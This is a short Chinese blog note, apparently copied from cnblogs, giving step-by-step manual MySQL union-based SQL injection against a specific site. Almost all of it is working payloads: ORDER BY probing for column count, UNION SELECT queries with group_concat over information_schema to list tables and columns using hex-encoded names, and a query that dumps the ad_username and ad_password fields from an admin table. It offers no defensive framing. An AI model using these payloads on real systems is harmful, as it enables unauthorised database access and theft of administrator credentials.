标签:
mysql注入 order by 17 正常 order by 18 不正常 说明列数是17 id=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 用加号 --号注释掉后面的语句 +and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22 版本 user() 用户 database() 数据库名称 shsjk 查到数据库名称后转换成16进制 小葵 爆表名 (5.00之后) wz_jj_admin +and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x7368736A6B [数据库名16进制] 爆列名 ad_username,ad_password +and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E[列名16进制] 爆出ad_username,ad_password的数据 union select 1,group_concat(ad_username,ad_password),3,4,5,6,7,8,9,10 from wz_jj_admin 这样不用
标签:
原文地址:http://www.cnblogs.com/test404/p/5479018.html
